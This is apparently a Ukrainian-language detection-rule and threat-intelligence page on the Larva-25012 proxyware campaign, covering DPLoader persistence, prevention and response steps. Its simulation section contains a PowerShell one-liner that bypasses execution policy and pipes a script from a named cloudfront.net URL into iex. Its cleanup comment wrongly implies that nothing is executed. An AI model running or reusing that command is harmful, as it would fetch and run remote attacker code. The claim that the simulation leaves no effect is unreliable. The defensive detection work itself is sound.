Larva-25012: Кампанія з поширення Proxyware 2026 року
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисник Larva-25012 активно поширює Proxyware для монетизації скомпрометованих систем шляхом викрадення інтернет-ширини користувачів. Кампанія базується на існуючих інфекціях DPLoader і використовує кілька каналів поширення, включаючи сайти завантаження YouTube і GitHub. Шкідливе ПЗ розгортає кілька сімей Proxyware, включаючи DigitalPulse, SOAX, Appsalt і IPRoyal.
Розслідування
AhnLab Security Intelligence Center (ASEC) відстежував поточну активність proxyjacking та ідентифікував відновлення операцій Larva-25012 у другій половині 2026 року. Розслідування виявило, що нападники використовують як JavaScript, так і Python варіанти DPLoader для підтримки стійкості та виконання команд PowerShell. Також створюються заплановані завдання, щоб забезпечити продовження роботи шкідливих скриптів на скомпрометованих системах.
Запобіжні заходи
Користувачам слід уникати завантаження виконуваних файлів з підозрілих вебсайтів, рекламних повідомлень чи неофіційних платформ обміну файлами. Програмне забезпечення слід отримувати лише з надійних та легітимних джерел, тоді як слід уникати піратських застосунків та нелегальних сайтів завантаження. Організації також повинні зберігати рішення для захисту кінцевих точок, включаючи V3, повністю оновленими.
Реагування
Коли виявляється підозріла активність, адміністратори повинні ідентифікувати та завершити шкідливі процеси PowerShell та заплановані завдання, пов’язані з ураженими сім’ями Proxyware. Системи також слід перевірити на наявність DPLoader, який слугує ключовим компонентом інфекції та стійкості. Перевірте вихідний мережевий трафік на предмет несанкціонованих з’єднань з відомою або підозрілою інфраструктурою C2.
Послідовність атаки
Ми все ще оновлюємо цю частину.
Виявлення
Завантаження або Вивантаження через Powershell (через cmdline)
Підозрілі дочірні процеси NodeJS [Windows] (через cmdline)
Відключення Моніторингу в реальному часі Windows Defender та Зміни Інших Налаштувань (через cmdline)
Виклик Підозрілих Методів .NET з Powershell (через powershell)
Можливе Зловживання Доменом Розробки Cloudflare (через dns)
IoC (HashMd5) для виявлення: Larva-25012: Кампанія поширення Proxyware у 2026 році
Виявлення Скриптів Інсталяції Proxyware через PowerShell [Windows Powershell]
Виконання Симуляції
-
Оповідь нападу & Команди: Противник, намагаючись встановити proxyware для несанкціонованого використання ширини каналу (Larva-25012), виконує одноразовий PowerShell скрипт. Мета – обійти локальне сканування файлів, завантажуючи корисне навантаження безпосередньо у пам’ять. Вони використовують опцію
-ExecutionPolicy Bypassщоб забезпечити виконання скрипта таiwrщоб отримати файл з розподілу Cloudfront, передаючи його доiexдля негайного виконання. Ця конкретна командна лінія є однією з цільових сигнатур у правилі виявлення. -
Сценарій для Тестування Регресії:
# Симуляція Інсталяції Proxyware Larva-25012 # Ця команда спеціально розроблена для відповідності селекції2 у правилі виявлення. $cmd = 'PowerShell.Exe -ExecutionPolicy Bypass -Command "iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex"' # Ми використовуємо Start-Process, щоб забезпечити захоплення командного рядка як нове подія процесу Start-Process "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -Command `"iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex`"" -
Команди для Очищення:
# Файли фактично не завантажуються через природу 'iex' труби у симуляції, # але якщо якісь артефакти були створені, вони будуть видалені тут. Write-Host "Очищення симуляції завершено. Постійні артефакти не створені."